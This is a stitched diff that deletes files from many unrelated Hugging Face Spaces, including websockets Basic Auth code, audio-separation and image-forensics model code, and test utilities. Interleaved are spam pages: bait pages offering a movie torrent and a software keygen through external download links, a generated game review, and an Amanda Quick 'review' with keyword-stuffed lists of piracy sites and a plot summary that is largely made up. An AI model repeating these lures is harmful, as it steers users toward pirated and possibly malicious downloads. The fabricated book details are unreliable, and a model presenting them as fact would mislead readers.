service. - - Args: - username: HTTP Basic Auth username. - password: HTTP Basic Auth password. - - Returns: - bool: :obj:`True` if the handshake should continue; - :obj:`False` if it should fail with an HTTP 401 error. - - """ - if self._check_credentials is not None: - return await self._check_credentials(username, password) - - return False - - async def process_request( - self, - path: str, - request_headers: Headers, - ) -> Optional[HTTPResponse]: - """ - Check HTTP Basic Auth and return an HTTP 401 response if needed. - - """ - try: - authorization = request_headers["Authorization"] - except KeyError: - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Missing credentials\n", - ) - - try: - username, password = parse_authorization_basic(authorization) - except InvalidHeader: - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Unsupported credentials\n", - ) - - if not await self.check_credentials(username, password): - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Invalid credentials\n", - ) - - self.username = username - - return await super().process_request(path, request_headers) - - -def basic_auth_protocol_factory( - realm: Optional[str] = None, - credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None, - check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None, - create_protocol: Optional[Callable[..., BasicAuthWebSocketServerProtocol]] = None, -) -> Callable[..., BasicAuthWebSocketServerProtocol]: - """ - Protocol factory that enforces HTTP Basic Auth. - - :func:`basic_auth_protocol_factory` is designed to integrate with - :func:`~websockets.server.serve` like this:: - - websockets.serve( - ..., - create_protocol=websockets.basic_auth_protocol_factory( - realm="my dev server", - credentials=("hello", "iloveyou"), - ) - ) - - Args: - realm: Scope of protection. It should contain only ASCII characters - because the encoding of non-ASCII characters is undefined. - Refer to section 2.2 of :rfc:`7235` for details. - credentials: Hard coded authorized credentials. It can be a - ``(username, password)`` pair or a list of such pairs. - check_credentials: Coroutine that verifies credentials. - It receives ``username`` and ``password`` arguments - and returns a :class:`bool`. One of ``credentials`` or - ``check_credentials`` must be provided but not both. - create_protocol: Factory that creates the protocol. By default, this - is :class:`BasicAuthWebSocketServerProtocol`. It can be replaced - by a subclass. - Raises: - TypeError: If the ``credentials`` or ``check_credentials`` argument is - wrong. - - """ - if (credentials is None) == (check_credentials is None): - raise TypeError("provide either credentials or check_credentials") - - if credentials is not None: - if is_credentials(credentials): - credentials_list = [cast(Credentials, credentials)] - elif isinstance(credentials, Iterable): - credentials_list = list(credentials) - if not all(is_credentials(item) for item in credentials_list): - raise TypeError(f"invalid credentials argument: {credentials}") - else: - raise TypeError(f"invalid credentials argument: {credentials}") - - credentials_dict = dict(credentials_list) - - async def check_credentials(username: str, password: str) -> bool: - try: - expected_password = credentials_dict[username] - except KeyError: - return False - return hmac.compare_digest(expected_password, password) - - if create_protocol is None: - create_protocol = BasicAuthWebSocketServerProtocol - - return functools.partial( - create_protocol, - realm=realm, - check_credentials=check_credentials, - ) diff --git a/spaces/pseudolab/SonGPT/README.md b/spaces/pseudolab/SonGPT/README.md deleted file mode 100644 index 9283ebb9d8a1cc8afe4d4da32303a90624dcea76..0000000000000000000000000000000000000000 --- a/spaces/pseudolab/SonGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SonGPT -emoji: ⚽🇰🇷 -colorFrom: pink -colorTo: blue -sdk: streamlit -sdk_version: 1.28.1 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/qingxu98/gpt-academic/tests/test_utils.py b/spaces/qingxu98/gpt-academic/tests/test_utils.py deleted file mode 100644 index 1fdca1eb1f699256c0ea7a7d0455352497d6f76c..0000000000000000000000000000000000000000 --- a/spaces/qingxu98/gpt-academic/tests/test_utils.py +++ /dev/null @@ -1,81 +0,0 @@ -from toolbox import get_conf -from toolbox import set_conf -from toolbox import set_multi_conf -from toolbox import get_plugin_handle -from toolbox import get_plugin_default_kwargs -from toolbox import get_chat_handle -from toolbox import get_chat_default_kwargs -from functools import wraps -import sys -import os - -def chat_to_markdown_str(chat): - result = "" - for i, cc in enumerate(chat): - result += f'\n\n{cc[0]}\n\n{cc[1]}' - if i != len(chat)-1: - result += '\n\n---' - return result - -def silence_stdout(func): - @wraps(func) - def wrapper(*args, **kwargs): - _original_stdout = sys.stdout - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - for q in func(*args, **kwargs): - sys.stdout = _original_stdout - yield q - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - sys.stdout.close() - sys.stdout = _original_stdout - return wrapper - -def silence_stdout_fn(func): - @wraps(func) - def wrapper(*args, **kwargs): - _original_stdout = sys.stdout - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - result = func(*args, **kwargs) - sys.stdout.close() - sys.stdout = _original_stdout - return result - return wrapper - -class VoidTerminal(): - def __init__(self) -> None: - pass - -vt = VoidTerminal() -vt.get_conf = silence_stdout_fn(get_conf) -vt.set_conf = silence_stdout_fn(set_conf) -vt.set_multi_conf = silence_stdout_fn(set_multi_conf) -vt.get_plugin_handle = silence_stdout_fn(get_plugin_handle) -vt.get_plugin_default_kwargs = silence_stdout_fn(get_plugin_default_kwargs) -vt.get_chat_handle = silence_stdout_fn(get_chat_handle) -vt.get_chat_default_kwargs = silence_stdout_fn(get_chat_default_kwargs) -vt.chat_to_markdown_str = chat_to_markdown_str -proxies, WEB_PORT, LLM_MODEL, CONCURRENT_COUNT, AUTHENTICATION, CHATBOT_HEIGHT, LAYOUT, API_KEY = \ - vt.get_conf('proxies', 'WEB_PORT', 'LLM_MODEL', 'CONCURRENT_COUNT', 'AUTHENTICATION', 'CHATBOT_HEIGHT', 'LAYOUT', 'API_KEY') - -def plugin_test(main_input, plugin, advanced_arg=None): - from rich.live import Live - from rich.markdown import Markdown - - vt.set_conf(key="API_KEY", value=API_KEY) - vt.set_conf(key="LLM_MODEL", value=LLM_MODEL) - - plugin = vt.get_plugin_handle(plugin) - plugin_kwargs = vt.get_plugin_default_kwargs() - plugin_kwargs['main_input'] = main_input - if advanced_arg is not None: - plugin_kwargs['plugin_kwargs'] = advanced_arg - my_working_plugin = silence_stdout(plugin)(**plugin_kwargs) - - with Live(Markdown(""), auto_refresh=False, vertical_overflow="visible") as live: - for cookies, chat, hist, msg in my_working_plugin: - md_str = vt.chat_to_markdown_str(chat) - md = Markdown(md_str) - live.update(md, refresh=True) \ No newline at end of file diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md b/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md deleted file mode 100644 index c3abe83426587aeab9a852522392da87f0b0df27..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Download Dear Zindagi Full Movie With English Subtitles In Torrent


      Download Filehttps://geags.com/2uCswM



      -
      - 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md b/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md deleted file mode 100644 index 997136761e5614504d5d2344e8407aecd485853e..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md +++ /dev/null @@ -1,6 +0,0 @@ -

      EOBDFacile.Keygen.2015.v5.rar keygen


      DOWNLOAD ••• https://geags.com/2uCqEE



      - - d5da3c52bf
      -
      -
      -

      diff --git a/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py b/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py deleted file mode 100644 index 4cc7c08b37bc371294f2f82b3382424a5455b7c2..0000000000000000000000000000000000000000 --- a/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py +++ /dev/null @@ -1,228 +0,0 @@ -import torch -import onnxruntime as ort -from tqdm import tqdm -import warnings -import numpy as np -import hashlib -import queue -import threading - -warnings.filterwarnings("ignore") - -class MDX_Model: - def __init__(self, device, dim_f, dim_t, n_fft, hop=1024, stem_name=None, compensation=1.000): - self.dim_f = dim_f - self.dim_t = dim_t - self.dim_c = 4 - self.n_fft = n_fft - self.hop = hop - self.stem_name = stem_name - self.compensation = compensation - - self.n_bins = self.n_fft//2+1 - self.chunk_size = hop * (self.dim_t-1) - self.window = torch.hann_window(window_length=self.n_fft, periodic=True).to(device) - - out_c = self.dim_c - - self.freq_pad = torch.zeros([1, out_c, self.n_bins-self.dim_f, self.dim_t]).to(device) - - def stft(self, x): - x = x.reshape([-1, self.chunk_size]) - x = torch.stft(x, n_fft=self.n_fft, hop_length=self.hop, window=self.window, center=True, return_complex=True) - x = torch.view_as_real(x) - x = x.permute([0,3,1,2]) - x = x.reshape([-1,2,2,self.n_bins,self.dim_t]).reshape([-1,4,self.n_bins,self.dim_t]) - return x[:,:,:self.dim_f] - - def istft(self, x, freq_pad=None): - freq_pad = self.freq_pad.repeat([x.shape[0],1,1,1]) if freq_pad is None else freq_pad - x = torch.cat([x, freq_pad], -2) - # c = 4*2 if self.target_name=='*' else 2 - x = x.reshape([-1,2,2,self.n_bins,self.dim_t]).reshape([-1,2,self.n_bins,self.dim_t]) - x = x.permute([0,2,3,1]) - x = x.contiguous() - x = torch.view_as_complex(x) - x = torch.istft(x, n_fft=self.n_fft, hop_length=self.hop, window=self.window, center=True) - return x.reshape([-1,2,self.chunk_size]) - - -class MDX: - - DEFAULT_SR = 44100 - # Unit: seconds - DEFAULT_CHUNK_SIZE = 0 * DEFAULT_SR - DEFAULT_MARGIN_SIZE = 1 * DEFAULT_SR - - DEFAULT_PROCESSOR = 0 - - def __init__(self, model_path:str, params:MDX_Model, processor=DEFAULT_PROCESSOR): - - # Set the device and the provider (CPU or CUDA) - self.device = torch.device(f'cuda:{processor}') if processor >= 0 else torch.device('cpu') - self.provider = ['CUDAExecutionProvider'] if processor >= 0 else ['CPUExecutionProvider'] - - self.model = params - - # Load the ONNX model using ONNX Runtime - self.ort = ort.InferenceSession(model_path, providers=self.provider) - # Preload the model for faster performance - self.ort.run(None, {'input':torch.rand(1, 4, params.dim_f, params.dim_t).numpy()}) - self.process = lambda spec:self.ort.run(None, {'input': spec.cpu().numpy()})[0] - - self.prog = None - - @staticmethod - def get_hash(model_path): - try: - with open(model_path, 'rb') as f: - f.seek(- 10000 * 1024, 2) - model_hash = hashlib.md5(f.read()).hexdigest() - except: - model_hash = hashlib.md5(open(model_path,'rb').read()).hexdigest() - - return model_hash - - @staticmethod - def segment(wave, combine=True, chunk_size=DEFAULT_CHUNK_SIZE, margin_size=DEFAULT_MARGIN_SIZE): - """ - Segment or join segmented wave array - - Args: - wave: (np.array) Wave array to be segmented or joined - combine: (bool) If True, combines segmented wave array. If False, segments wave array. - chunk_size: (int) Size of each segment (in samples) - margin_size: (int) Size of margin between segments (in samples) - - Returns: - numpy array: Segmented or joined wave array - """ - - if combine: - processed_wave = None # Initializing as None instead of [] for later numpy array concatenation - for segment_count, segment in enumerate(wave): - start = 0 if segment_count == 0 else margin_size - end = None if segment_count == len(wave)-1 else -margin_size - if margin_size == 0: - end = None - if processed_wave is None: # Create array for first segment - processed_wave = segment[:, start:end] - else: # Concatenate to existing array for subsequent segments - processed_wave = np.concatenate((processed_wave, segment[:, start:end]), axis=-1) - - else: - processed_wave = [] - sample_count = wave.shape[-1] - - if chunk_size <= 0 or chunk_size > sample_count: - chunk_size = sample_count - - if margin_size > chunk_size: - margin_size = chunk_size - - for segment_count, skip in enumerate(range(0, sample_count, chunk_size)): - - margin = 0 if segment_count == 0 else margin_size - end = min(skip+chunk_size+margin_size, sample_count) - start = skip-margin - - cut = wave[:,start:end].copy() - processed_wave.append(cut) - - if end == sample_count: - break - - return processed_wave - - def pad_wave(self, wave): - """ - Pad the wave array to match the required chunk size - - Args: - wave: (np.array) Wave array to be padded - - Returns: - tuple: (padded_wave, pad, trim) - - padded_wave: Padded wave array - - pad: Number of samples that were padded - - trim: Number of samples that were trimmed - """ - n_sample = wave.shape[1] - trim = self.model.n_fft//2 - gen_size = self.model.chunk_size-2*trim - pad = gen_size - n_sample%gen_size - - # Padded wave - wave_p = np.concatenate((np.zeros((2,trim)), wave, np.zeros((2,pad)), np.zeros((2,trim))), 1) - - mix_waves = [] - for i in range(0, n_sample+pad, gen_size): - waves = np.array(wave_p[:, i:i+self.model.chunk_size]) - mix_waves.append(waves) - - mix_waves = torch.tensor(mix_waves, dtype=torch.float32).to(self.device) - - return mix_waves, pad, trim - - def _process_wave(self, mix_waves, trim, pad, q:queue.Queue, _id:int): - """ - Process each wave segment in a multi-threaded environment - - Args: - mix_waves: (torch.Tensor) Wave segments to be processed - trim: (int) Number of samples trimmed during padding - pad: (int) Number of samples padded during padding - q: (queue.Queue) Queue to hold the processed wave segments - _id: (int) Identifier of the processed wave segment - - Returns: - numpy array: Processed wave segment - """ - mix_waves = mix_waves.split(1) - with torch.no_grad(): - pw = [] - for mix_wave in mix_waves: - self.prog.update() - spec = self.model.stft(mix_wave) - processed_spec = torch.tensor(self.process(spec)) - processed_wav = self.model.istft(processed_spec.to(self.device)) - processed_wav = processed_wav[:,:,trim:-trim].transpose(0,1).reshape(2, -1).cpu().numpy() - pw.append(processed_wav) - processed_signal = np.concatenate(pw, axis=-1)[:, :-pad] - q.put({_id:processed_signal}) - return processed_signal - - def process_wave(self, wave:np.array, mt_threads=1): - """ - Process the wave array in a multi-threaded environment - - Args: - wave: (np.array) Wave array to be processed - mt_threads: (int) Number of threads to be used for processing - - Returns: - numpy array: Processed wave array - """ - self.prog = tqdm(total=0) - chunk = wave.shape[-1]//mt_threads - waves = self.segment(wave, False, chunk) - - # Create a queue to hold the processed wave segments - q = queue.Queue() - threads = [] - for c, batch in enumerate(waves): - mix_waves, pad, trim = self.pad_wave(batch) - self.prog.total = len(mix_waves)*mt_threads - thread = threading.Thread(target=self._process_wave, args=(mix_waves, trim, pad, q, c)) - thread.start() - threads.append(thread) - for thread in threads: - thread.join() - self.prog.close() - - processed_batches = [] - while not q.empty(): - processed_batches.append(q.get()) - processed_batches = [list(wave.values())[0] for wave in sorted(processed_batches, key=lambda d: list(d.keys())[0])] - assert len(processed_batches) == len(waves), 'Incomplete processed batches, please reduce batch size!' - return self.segment(processed_batches, True, chunk) \ No newline at end of file diff --git a/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py b/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py deleted file mode 100644 index 084a39bc0ee42a533d6151508ec93fc3680753fd..0000000000000000000000000000000000000000 --- a/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py +++ /dev/null @@ -1,95 +0,0 @@ -import math -import torch -import torch.nn as nn -from networks.drn import drn_c_26 - - -def fill_up_weights(up): - w = up.weight.data - f = math.ceil(w.size(2) / 2) - c = (2 * f - 1 - f % 2) / (2. * f) - for i in range(w.size(2)): - for j in range(w.size(3)): - w[0, 0, i, j] = \ - (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c)) - for c in range(1, w.size(0)): - w[c, 0, :, :] = w[0, 0, :, :] - - -class DRNSeg(nn.Module): - def __init__(self, classes, pretrained_drn=False, - pretrained_model=None, use_torch_up=False): - super(DRNSeg, self).__init__() - - model = drn_c_26(pretrained=pretrained_drn) - self.base = nn.Sequential(*list(model.children())[:-2]) - if pretrained_model: - self.load_pretrained(pretrained_model) - - self.seg = nn.Conv2d(model.out_dim, classes, - kernel_size=1, bias=True) - - m = self.seg - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. / n)) - m.bias.data.zero_() - if use_torch_up: - self.up = nn.UpsamplingBilinear2d(scale_factor=8) - else: - up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4, - output_padding=0, groups=classes, - bias=False) - fill_up_weights(up) - up.weight.requires_grad = False - self.up = up - - def forward(self, x): - x = self.base(x) - x = self.seg(x) - y = self.up(x) - return y - - def optim_parameters(self, memo=None): - for param in self.base.parameters(): - yield param - for param in self.seg.parameters(): - yield param - - def load_pretrained(self, pretrained_model): - print("loading the pretrained drn model from %s" % pretrained_model) - state_dict = torch.load(pretrained_model, map_location='cpu') - if hasattr(state_dict, '_metadata'): - del state_dict._metadata - - # filter out unnecessary keys - pretrained_dict = state_dict['model'] - pretrained_dict = {k[5:]: v for k, v in pretrained_dict.items() if k.split('.')[0] == 'base'} - - # load the pretrained state dict - self.base.load_state_dict(pretrained_dict) - - -class DRNSub(nn.Module): - def __init__(self, num_classes, pretrained_model=None, fix_base=False): - super(DRNSub, self).__init__() - - drnseg = DRNSeg(2) - if pretrained_model: - print("loading the pretrained drn model from %s" % pretrained_model) - state_dict = torch.load(pretrained_model, map_location='cpu') - drnseg.load_state_dict(state_dict['model']) - - self.base = drnseg.base - if fix_base: - for param in self.base.parameters(): - param.requires_grad = False - - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.fc = nn.Linear(512, num_classes) - - def forward(self, x): - x = self.base(x) - x = self.avgpool(x) - x = x.view(x.size(0), -1) - x = self.fc(x) - return x diff --git a/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js b/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js deleted file mode 100644 index 187dccf3ab1931b3a173153a820615818e969d5f..0000000000000000000000000000000000000000 --- a/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js +++ /dev/null @@ -1,22 +0,0 @@ -import { json } from '@sveltejs/kit'; -import PipelineSingleton from '$lib/server/pipeline.js'; - -export async function GET({ url }) { - const text = url.searchParams.get('text'); - if (!text) { - return json( - { - error: 'Missing text parameter' - }, - { status: 400 } - ); - } - // Get the classification pipeline. When called for the first time, - // this will load the pipeline and cache it for future use. - const classifier = await PipelineSingleton.getInstance(); - - // Actually perform the classification - const result = await classifier(text); - - return json(result); -} diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md b/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md deleted file mode 100644 index 73d20126903c756e7206fb79f8f1586c8a05afec..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md +++ /dev/null @@ -1,24 +0,0 @@ -
      -

      Alexandra Ledermann 8: Les Secrets du Haras - A Review

      -

      Alexandra Ledermann 8: Les Secrets du Haras is a horse riding simulation and adventure game for PC, released in 2007 by Lexis Numérique and Ubisoft. It is the eighth installment in the popular Alexandra Ledermann series, which features the French equestrian champion as a mentor and guide.

      -

      alexandra ledermann 8 secret des


      Download Zip 🆗 https://tinourl.com/2uL05u



      -

      In this game, you play as Emma, a young Franco-American veterinary student who arrives at a stud farm whose owner has mysteriously disappeared. You have to take care of the animals left alone, participate in competitions, earn rewards, and explore a rich and vast world. You also have to unravel the secrets of the stud farm and its owner, while making friends and enemies along the way.

      -

      The game boasts realistic graphics, animations, and sounds, as well as a dynamic weather system and a day-night cycle. You can customize your character and your horse, choose from different breeds and colors, and equip them with various accessories. You can also interact with other characters and horses, using dialogue options and gestures.

      -

      The game offers two modes of play: story mode and free mode. In story mode, you follow the main plot and complete missions and challenges. In free mode, you can roam around the world and do whatever you want, such as training your horse, collecting items, or taking photos.

      -

      -

      The game also features a multiplayer mode, where you can compete with up to four players online or on a local network. You can choose from different types of events, such as dressage, show jumping, cross country, or barrel racing. You can also chat with other players and exchange items.

      -

      Alexandra Ledermann 8: Les Secrets du Haras is a fun and engaging game for horse lovers and adventure seekers. It offers a lot of content and variety, as well as a captivating story and characters. If you are looking for a game that combines horse riding simulation and adventure, you should definitely check out Alexandra Ledermann 8: Les Secrets du Haras.

      - -

      Alexandra Ledermann 8: Les Secrets du Haras - A Gameplay Overview

      -

      The gameplay of Alexandra Ledermann 8: Les Secrets du Haras is divided into three main aspects: horse riding, adventure, and management. Each aspect has its own mechanics and objectives, and they are interconnected by the story and the world.

      -

      Horse Riding

      -

      Horse riding is the core of the game, as it allows you to travel around the world, participate in competitions, and bond with your horse. You can control your horse using the keyboard or the mouse, and you have to pay attention to its speed, stamina, mood, and health. You also have to take care of your horse by grooming it, feeding it, and treating its injuries.

      -

      The game features different types of horse riding events, such as dressage, show jumping, cross country, or barrel racing. Each event has its own rules and challenges, and you have to perform well to earn points and medals. You can also practice your skills in training mode, where you can set your own goals and obstacles.

      -

      Adventure

      -

      Adventure is the aspect that drives the story and the exploration of the game. You can interact with various characters and objects in the world, using dialogue options and gestures. You can also collect items, such as photos, trophies, clothes, or accessories. Some items are useful for your horse or your missions, while others are just for fun.

      -

      The game has a mystery plot that involves the disappearance of the stud farm owner and her secrets. You have to investigate clues, solve puzzles, and make choices that affect the outcome of the story. You also have to deal with different factions and characters that have their own agendas and personalities.

      -

      Management

      -

      Management is the aspect that involves running the stud farm and taking care of the animals. You have to manage your budget, your staff, your facilities, and your reputation. You have to buy and sell horses, hire and fire employees, upgrade and repair buildings, and attract customers and sponsors.

      -

      You also have to take care of the animals in the stud farm, such as horses, dogs, cats, or rabbits. You have to feed them, clean them, play with them, and heal them. You can also breed horses and create new generations with different traits and abilities.

      81aa517590
      -
      -
      \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md b/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md deleted file mode 100644 index e437ef889f7e4f345d145d9cc67b0a9388103302..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md +++ /dev/null @@ -1,143 +0,0 @@ - -

      Capcanele Iubirii Amanda Quick Pdf 21: A Review of the Final Part of the Deception Trilogy

      -

      If you are a fan of historical romance novels with a touch of mystery and suspense, you might have heard of Capcanele Iubirii Amanda Quick Pdf 21, the final part of the Deception Trilogy by Amanda Quick. This book is available online as a PDF file and has been translated into Romanian from the original English title Deception. In this article, we will review this book and see what makes it a captivating read for romance lovers.

      -

      capcanele iubirii amanda quick pdf 21


      Download ○○○ https://tinourl.com/2uL5vd



      -

      Introduction

      -

      Before we dive into the summary and analysis of Capcanele Iubirii Amanda Quick Pdf 21, let us first introduce some background information about the book, the author, and the trilogy.

      -

      What is Capcanele Iubirii Amanda Quick Pdf 21?

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel that was published in 1994 by Bantam Books. It is the third and final part of the Deception Trilogy, which also includes Surrender (1990) and Scandal (1991). The book follows the story of Olympia Wingfield, a spinster who inherits a mysterious mansion and a handsome guardian, Jared Ryder, Viscount Chillhurst. Together, they embark on a dangerous adventure to uncover the secrets of Olympia's past and find true love along the way.

      -

      Who is Amanda Quick?

      -

      Amanda Quick is the pen name of Jayne Ann Krentz, a bestselling American author who has written over 50 novels in various genres, such as contemporary romance, historical romance, paranormal romance, and romantic suspense. She has also written under other pseudonyms, such as Jayne Castle and Jayne Taylor. She is known for her witty dialogue, strong female characters, and intricate plots. She has won numerous awards and accolades for her work, such as the Romance Writers of America RITA Award and the Romantic Times Career Achievement Award.

      -

      What is the Deception Trilogy?

      -

      The Deception Trilogy is a series of historical romance novels set in Regency England that feature three couples who fall in love while solving mysteries and facing dangers. The trilogy consists of Surrender, Scandal, and Deception. Each book can be read as a standalone, but they are connected by recurring characters and themes. The trilogy explores topics such as family secrets, social norms, trust, loyalty, and passion.

      -

      Summary of Capcanele Iubirii Amanda Quick Pdf 21

      -

      Now that we have some context about the book, let us summarize its main elements: the main characters, the plot, the setting, and the themes.

      -

      The main characters

      -

      The protagonist of Capcanele Iubirii Amanda Quick Pdf 21 is Olympia Wingfield, a 26-year-old spinster who lives in London with her three orphaned nephews. She is an independent and intelligent woman who loves reading Gothic novels and dreams of becoming a writer. She has a reputation for being eccentric and unconventional among her neighbors and relatives.

      -

      The hero of Capcanele Iubirii Amanda Quick Pdf 21 is Jared Ryder, Viscount Chillhurst, a 35-year-old aristocrat who works as a spy for the Crown. He is a handsome and mysterious man who has a dark past and a dangerous reputation. He is also an expert in ancient languages and codes.

      -

      The antagonist of Capcanele Iubirii Amanda Quick Pdf 21 is Lord Delbridge, a powerful and ruthless nobleman who wants to obtain Olympia's inheritance: a mansion called Stonegate that hides a secret treasure. He is willing to use any means necessary to achieve his goal, including murder and blackmail.

      -

      capcanele iubirii amanda quick pdf download
      -capcanele iubirii amanda quick pdf online
      -capcanele iubirii amanda quick pdf free
      -capcanele iubirii amanda quick pdf romanian
      -capcanele iubirii amanda quick pdf english
      -capcanele iubirii amanda quick pdf full
      -capcanele iubirii amanda quick pdf version
      -capcanele iubirii amanda quick pdf ebook
      -capcanele iubirii amanda quick pdf book
      -capcanele iubirii amanda quick pdf summary
      -capcanele iubirii amanda quick pdf review
      -capcanele iubirii amanda quick pdf genre
      -capcanele iubirii amanda quick pdf series
      -capcanele iubirii amanda quick pdf author
      -capcanele iubirii amanda quick pdf cover
      -capcanele iubirii amanda quick pdf format
      -capcanele iubirii amanda quick pdf size
      -capcanele iubirii amanda quick pdf pages
      -capcanele iubirii amanda quick pdf read
      -capcanele iubirii amanda quick pdf audiobook
      -capcanele iubirii amanda quick pdf epub
      -capcanele iubirii amanda quick pdf mobi
      -capcanele iubirii amanda quick pdf kindle
      -capcanele iubirii amanda quick pdf nook
      -capcanele iubirii amanda quick pdf kobo
      -capcanele iubirii amanda quick pdf scribd
      -capcanele iubirii amanda quick pdf goodreads
      -capcanele iubirii amanda quick pdf amazon
      -capcanele iubirii amanda quick pdf barnes and noble
      -capcanele iubirii amanda quick pdf walmart
      -capcanele iubirii amanda quick pdf ebay
      -capcanele iubirii amanda quick pdf library genesis
      -capcanele iubirii amanda quick pdf z library
      -capcanele iubirii amanda quick pdf b-ok.org
      -capcanele iubirii amanda quick pdf libgen.io
      -capcanele iubirii amanda quick pdf 1lib.us
      -capcanele iubirii amanda quick pdf book4you.org
      -capcanele iubirii amanda quick pdf booksc.org
      -capcanele iubirii amanda quick pdf b-ok.cc
      -capcanele iubirii amanda quick pdf libgen.is
      -capcanele iubirii amanda quick pdf libgen.li
      -capcanele iubirii amanda quick pdf libgen.pw
      -capcanele iubirii amanda quick pdf libgen.rs
      -capcanele iubirii amanda quick pdf libgen.fun
      -capcanele iubirii amanda quick pdf libgen.la
      -capcanele iubirii amanda quick pdf libgen.me
      -capcanele iubirii amanda quick pdf libgen.nu
      -capcanele iubirii amanda quick pdf libgen.su

      -

      The plot

      -

      The plot of Capcanele Iubirii Amanda Quick Pdf 21 begins when Olympia receives a letter from her late uncle's solicitor informing her that she has inherited Stonegate from him. She decides to travel to Cornwall with her nephews to see her new property. However, she soon discovers that Stonegate is not what she expected: it is a dilapidated and haunted mansion that has been abandoned for years.

      -

      Olympia also learns that she has inherited another thing from her uncle: a guardian named Jared Ryder, Viscount Chillhurst. Jared arrives at Stonegate shortly after Olympia and introduces himself as her uncle's friend and protector. He claims that he has been appointed by her uncle to help her manage Stonegate and keep her safe from any danger.

      -

      Olympia is suspicious of Jared's motives and does not trust him at first. She thinks that he is hiding something from her and that he might be after her inheritance. However, she also feels an undeniable attraction to him and admires his courage and intelligence.

      -

      Jared is also attracted to Olympia and respects her independence and curiosity. He knows that he has to tell her the truth about his mission: he is actually a spy who has been sent by his superior to investigate Stonegate's secret treasure. He believes that Stonegate contains an ancient manuscript that holds the key to a powerful weapon that could change the course of history.

      -

      Jared also knows that he has to protect Olympia from Lord Delbridge, who is also after Stonegate's treasure. Lord Delbridge has hired some thugs to harass Olympia and force her to sell Stonegate to him. He has also kidnapped Olympia's cousin Lavinia, who knows something about Stonegate's history.

      -

      Olympia and Jared decide to work together to solve the mystery of Stonegate and rescue Lavinia. They explore the mansion's hidden passages and chambers, decipher clues and codes left by Olympia's uncle, and face various dangers and traps along the way. They also grow closer to each other and fall in love.

      -

      The climax of Capcanele Iubirii Amanda Quick Pdf 21 occurs when Olympia and Jared find out that Stonegate's treasure is not a manuscript but a jewel called the Eye of Fire. The Eye of Fire is an ancient artifact that can create fireballs when activated by certain words. Olympia's uncle had discovered it in Egypt and brought it to England for safekeeping.

      -

      Olympia and Jared are confronted by Lord Delbridge in Stonegate's secret vault where the Eye of Fire is hidden. Lord Delbridge tries to take the jewel from them but fails because he does not know how to activate it. He then threatens to kill Lavinia unless Olympia gives him the jewel.

      -

      Olympia agrees to give Lord Delbridge the jewel but secretly writes down its activation code on a piece of paper. She then throws the paper into the fire before handing over the jewel to Lord Delbridge. Lord Delbridge does not notice this trick until it is too late: he reads out loud the code from memory but accidentally activates the Eye of Fire instead.

      -

      The Eye of Fire unleashes a fireball that destroys Lord Delbridge and his men. Olympia and Jared manage to escape with Lavinia before Stonegate collapses from the explosion.

      -

      The resolution of Capcanele Iubirii Amanda Quick Pdf 21 occurs when Olympia and Jared return to London with their nephews and Lavinia. They get married in a small ceremony attended by their friends and family. They also decide to write a novel together based on their adventure at Stonegate.

      -

      The setting

      -

      The setting of Capcanele Iubirii Amanda Quick Pdf 21 is Regency England in 1815. The story takes place mostly in Cornwall at Stonegate mansion but also in London at Olympia's house.

      -

